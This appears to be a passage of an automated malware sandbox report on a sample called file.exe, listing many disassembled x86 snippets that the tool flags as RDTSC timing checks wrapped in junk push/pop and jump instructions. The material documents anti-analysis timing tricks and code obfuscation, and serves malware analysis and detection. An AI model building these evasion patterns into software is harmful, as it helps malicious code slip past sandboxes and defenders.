                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A009C second address: 49A00A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A00A2 second address: 49A00A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A00A8 second address: 49A00B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A00B7 second address: 49A00BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A00BB second address: 49A00BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A00BF second address: 49A00C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A00C5 second address: 49A00CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A00CB second address: 49A00CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A00CF second address: 49A00D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A00D3 second address: 49A0103 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov eax, ebx 0x0000000c mov bl, 13h 0x0000000e popad 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 mov ebx, esi 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F05ECE231C8h 0x0000001d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0103 second address: 49A013C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECFAD30Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+04h] 0x0000000c jmp 00007F05ECFAD316h 0x00000011 push dword ptr [ebp+0Ch] 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F05ECFAD30Ah 0x0000001d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A013C second address: 49A014B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECE231BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0C99 second address: 49C0C9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0C9D second address: 49C0CA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0CA3 second address: 49C0CD0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECFAD30Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F05ECFAD317h 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0CD0 second address: 49C0CE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05ECE231C4h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0865 second address: 49C0877 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05ECFAD30Eh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0877 second address: 49C087B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C076C second address: 49C079D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F05ECFAD317h 0x00000008 pop ecx 0x00000009 push edi 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F05ECFAD30Ch 0x00000018 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C079D second address: 49C07A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C07A3 second address: 49C07A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0488 second address: 49C048C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C048C second address: 49C0492 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0492 second address: 49C0498 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0498 second address: 49C049C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C049C second address: 49C04F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECE231BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F05ECE231C0h 0x00000011 push eax 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F05ECE231C1h 0x00000019 add esi, 1BE5CEA6h 0x0000001f jmp 00007F05ECE231C1h 0x00000024 popfd 0x00000025 mov bx, cx 0x00000028 popad 0x00000029 xchg eax, ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C04F7 second address: 49C0500 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dx, F448h 0x00000008 popad 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0500 second address: 49C0583 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, esi 0x00000005 pushfd 0x00000006 jmp 00007F05ECE231C8h 0x0000000b sbb ax, 36A8h 0x00000010 jmp 00007F05ECE231BBh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov ebp, esp 0x0000001b pushad 0x0000001c mov ecx, 0661A0BBh 0x00000021 mov ax, 8D97h 0x00000025 popad 0x00000026 pop ebp 0x00000027 pushad 0x00000028 pushad 0x00000029 mov cl, AFh 0x0000002b call 00007F05ECE231BBh 0x00000030 pop esi 0x00000031 popad 0x00000032 push eax 0x00000033 push edx 0x00000034 pushfd 0x00000035 jmp 00007F05ECE231BFh 0x0000003a xor esi, 2F02294Eh 0x00000040 jmp 00007F05ECE231C9h 0x00000045 popfd 0x00000046 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0319 second address: 49D0322 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, CBC4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0322 second address: 49D0330 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0330 second address: 49D0334 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0334 second address: 49D034F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECE231C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D034F second address: 49D0354 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0354 second address: 49D0390 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c jmp 00007F05ECE231C7h 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007F05ECE231C1h 0x0000001d popad 0x0000001e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00F5D second address: 4A00FB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECFAD311h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F05ECFAD311h 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F05ECFAD30Ch 0x00000017 jmp 00007F05ECFAD315h 0x0000001c popfd 0x0000001d mov di, ax 0x00000020 popad 0x00000021 mov ebp, esp 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00FB5 second address: 4A00FB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00FB9 second address: 4A00FBF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00FBF second address: 4A00FC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E04E9 second address: 49E04F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECFAD30Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E04F8 second address: 49E0537 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECE231C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F05ECE231C1h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F05ECE231BDh 0x00000017 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0537 second address: 49E053D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E053D second address: 49E0541 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0541 second address: 49E0571 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b jmp 00007F05ECFAD315h 0x00000010 push esi 0x00000011 mov di, 46E2h 0x00000015 pop ebx 0x00000016 popad 0x00000017 mov eax, dword ptr [ebp+08h] 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0571 second address: 49E0575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0575 second address: 49E0579 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0579 second address: 49E057F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E057F second address: 49E05BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECFAD30Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and dword ptr [eax], 00000000h 0x0000000c pushad 0x0000000d jmp 00007F05ECFAD30Eh 0x00000012 mov eax, 30A47BC1h 0x00000017 popad 0x00000018 and dword ptr [eax+04h], 00000000h 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F05ECFAD313h 0x00000023 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E05BE second address: 49E05D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05ECE231C4h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E05D6 second address: 49E05DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C06A6 second address: 49C06D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECE231C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F05ECE231C0h 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C06D2 second address: 49C06D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C06D8 second address: 49C0705 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECE231BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F05ECE231C7h 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0011 second address: 49E0103 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECFAD311h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b call 00007F05ECFAD30Ch 0x00000010 mov edi, esi 0x00000012 pop esi 0x00000013 pushad 0x00000014 call 00007F05ECFAD30Dh 0x00000019 pop esi 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d popad 0x0000001e push eax 0x0000001f pushad 0x00000020 call 00007F05ECFAD30Ah 0x00000025 mov di, si 0x00000028 pop ecx 0x00000029 pushfd 0x0000002a jmp 00007F05ECFAD317h 0x0000002f sub ecx, 06F3432Eh 0x00000035 jmp 00007F05ECFAD319h 0x0000003a popfd 0x0000003b popad 0x0000003c xchg eax, ebp 0x0000003d jmp 00007F05ECFAD30Eh 0x00000042 mov ebp, esp 0x00000044 pushad 0x00000045 pushfd 0x00000046 jmp 00007F05ECFAD30Eh 0x0000004b jmp 00007F05ECFAD315h 0x00000050 popfd 0x00000051 pushfd 0x00000052 jmp 00007F05ECFAD310h 0x00000057 add ah, 00000038h 0x0000005a jmp 00007F05ECFAD30Bh 0x0000005f popfd 0x00000060 popad 0x00000061 pop ebp 0x00000062 push eax 0x00000063 push edx 0x00000064 jmp 00007F05ECFAD315h 0x00000069 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E03DC second address: 49E03E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E03E2 second address: 49E03E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00701 second address: 4A0071E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05ECE231C9h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0071E second address: 4A00722 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00722 second address: 4A00811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a call 00007F05ECE231BAh 0x0000000f pushad 0x00000010 popad 0x00000011 pop esi 0x00000012 mov esi, edx 0x00000014 popad 0x00000015 xchg eax, ebp 0x00000016 pushad 0x00000017 call 00007F05ECE231C9h 0x0000001c pushfd 0x0000001d jmp 00007F05ECE231C0h 0x00000022 or ax, 8328h 0x00000027 jmp 00007F05ECE231BBh 0x0000002c popfd 0x0000002d pop eax 0x0000002e popad 0x0000002f mov ebp, esp 0x00000031 jmp 00007F05ECE231C2h 0x00000036 xchg eax, ecx 0x00000037 pushad 0x00000038 jmp 00007F05ECE231BEh 0x0000003d mov dx, cx 0x00000040 popad 0x00000041 push eax 0x00000042 jmp 00007F05ECE231C7h 0x00000047 xchg eax, ecx 0x00000048 jmp 00007F05ECE231C6h 0x0000004d mov eax, dword ptr [76FA65FCh] 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 pushfd 0x00000056 jmp 00007F05ECE231BDh 0x0000005b adc si, B4B6h 0x00000060 jmp 00007F05ECE231C1h 0x00000065 popfd 0x00000066 call 00007F05ECE231C0h 0x0000006b pop eax 0x0000006c popad 0x0000006d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00811 second address: 4A00817 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00817 second address: 4A0081B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0081B second address: 4A0084B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test eax, eax 0x0000000a jmp 00007F05ECFAD316h 0x0000000f je 00007F065F4D0431h 0x00000015 pushad 0x00000016 popad 0x00000017 mov ecx, eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0084B second address: 4A0084F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0084F second address: 4A0085F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECFAD30Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0085F second address: 4A00865 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00990 second address: 4A00994 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00994 second address: 4A009B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECE231C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A009B1 second address: 4A009C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05ECFAD30Ch 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0965 second address: 49D0994 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECFAD319h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F05ECFAD30Dh 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0994 second address: 49D0A35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F05ECE231C7h 0x00000008 pop eax 0x00000009 mov esi, edi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [76FAB370h] 0x00000013 jmp 00007F05ECE231BBh 0x00000018 xor dword ptr [ebp-08h], eax 0x0000001b jmp 00007F05ECE231C6h 0x00000020 xor eax, ebp 0x00000022 pushad 0x00000023 mov di, si 0x00000026 popad 0x00000027 nop 0x00000028 pushad 0x00000029 jmp 00007F05ECE231BEh 0x0000002e popad 0x0000002f push eax 0x00000030 pushad 0x00000031 mov cx, bx 0x00000034 mov dx, 9AA0h 0x00000038 popad 0x00000039 nop 0x0000003a jmp 00007F05ECE231BFh 0x0000003f lea eax, dword ptr [ebp-10h] 0x00000042 pushad 0x00000043 mov ecx, 123D6E0Bh 0x00000048 jmp 00007F05ECE231C0h 0x0000004d popad 0x0000004e mov dword ptr fs:[00000000h], eax 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 popad 0x0000005a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0A35 second address: 49D0A52 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECFAD319h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0A52 second address: 49D0A62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05ECE231BCh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0A62 second address: 49D0A66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0A66 second address: 49D0ADC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+08h] 0x0000000b jmp 00007F05ECE231C7h 0x00000010 mov eax, dword ptr [esi+10h] 0x00000013 jmp 00007F05ECE231C6h 0x00000018 test eax, eax 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F05ECE231BDh 0x00000023 and ax, 4F26h 0x00000028 jmp 00007F05ECE231C1h 0x0000002d popfd 0x0000002e jmp 00007F05ECE231C0h 0x00000033 popad 0x00000034 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0ADC second address: 49D0B03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 mov eax, edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007F065F48C544h 0x00000010 jmp 00007F05ECFAD30Fh 0x00000015 sub eax, eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0B03 second address: 49D0B07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0B07 second address: 49D0B0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0B0D second address: 49D0B1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [ebp-20h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0B1E second address: 49D0B22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0B22 second address: 49D0B28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0B28 second address: 49D0B2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0B2E second address: 49D0B7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECE231BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebx, dword ptr [esi] 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F05ECE231BEh 0x00000014 xor eax, 702537E8h 0x0000001a jmp 00007F05ECE231BBh 0x0000001f popfd 0x00000020 popad 0x00000021 mov dword ptr [ebp-24h], ebx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F05ECE231C0h 0x0000002b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0B7C second address: 49D0BF1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECFAD30Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test ebx, ebx 0x0000000b jmp 00007F05ECFAD316h 0x00000010 je 00007F065F48C3E0h 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F05ECFAD30Dh 0x0000001f jmp 00007F05ECFAD30Bh 0x00000024 popfd 0x00000025 pushfd 0x00000026 jmp 00007F05ECFAD318h 0x0000002b adc si, 3A38h 0x00000030 jmp 00007F05ECFAD30Bh 0x00000035 popfd 0x00000036 popad 0x00000037 rdtsc
